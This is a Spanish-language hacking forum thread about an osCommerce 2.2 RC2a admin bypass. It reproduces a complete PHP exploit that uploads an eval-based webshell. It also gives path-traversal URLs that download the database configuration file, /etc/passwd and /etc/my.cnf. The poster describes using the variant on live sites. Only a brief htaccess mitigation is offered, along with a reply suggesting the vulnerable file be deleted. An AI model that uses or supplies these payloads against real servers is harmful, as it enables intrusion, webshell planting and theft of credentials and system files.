elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [º] Exploit en osCommerce Online Merchant v2.2 RC2a
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [º] Exploit en osCommerce Online Merchant v2.2 RC2a  (Leído 10,640 veces)
CODE:NIAL

Desconectado Desconectado

Mensajes: 9


"No hay casualidades sino causalidades"...


Ver Perfil
[º] Exploit en osCommerce Online Merchant v2.2 RC2a
« en: 15 Noviembre 2009, 05:02 am »

Hola a todos.

He descubierto una variante del exploit publicada por Flyh4t en el sitio de milw0rm.com
http://www.milw0rm.com/exploits/9556

En este exploit no se explica la vulnerabilidad pero parece ser problema del archivo file_manager.php, ya que se puede bypassear al login.php.

En fin, este exploit describe que con la accion save (login.php?action=save) se puede crear un archivo con una shell en php.

Código:
 
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from'.$host;
    die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>

# milw0rm.com [2009-08-31]

Me di a la tarea de analizar el archivo y descubrí que la accion save no es la única que nos puede dar beneficios, ya que en el archivo está dada de alta otra funcion llamada download. De esta manera especificando la acción download con el respectivo nombre de archivo (login.php?action=download&filename=archivo) se pueden descargar archivos del servidor.

Qué diferencia hay entre el exploit publicado en milw0rm y la variante que les presento???. Bueno que en la mayoría de los sitios que probé no tenian permisos para escribir en ese directorio, por lo cual el exploit de milw0rm no pegó. En cambio con la variante pude descargarme los archivos en todo el server (con safe mode off)  :D.

En estos momentos estoy buscando en el código cuál fue el problema. El vendor dice que ya se hicieron los fix al problema,etc...   ::)

Conclusión:

Exploits:

(Archivo de configuraciones con el user y pass de la db)
http://vulnsite/admin/file_manager.php/login.php?action=download&filename=includes/configure.php

Ejemplo de descarga de otros archivos en el servidor no relacionados a oscommerce.

http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/passwd

http://vulnsite/admin/file_manager.php/login.php?action=download&filename=../../../../../../../../../etc/my.cnf

Solución más rápida: Configurar htaccess para impedir acceder a estos directorios y archivos sin firmarse.

Se aceptan críticas y comentarios.
En línea

w00t!
imefisto

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [º] Exploit en osCommerce Online Merchant v2.2 RC2a
« Respuesta #1 en: 11 Noviembre 2010, 15:31 pm »

Otra solución rápida a esto es eliminar el casi siempre inútil file_manager.php
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Múltiples vulnerabilidades en Oscommerce 2.2 RC2a « 1 2 3 »
Nivel Web
WHK 21 31,335 Último mensaje 6 Julio 2012, 23:15 pm
por kalimoro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines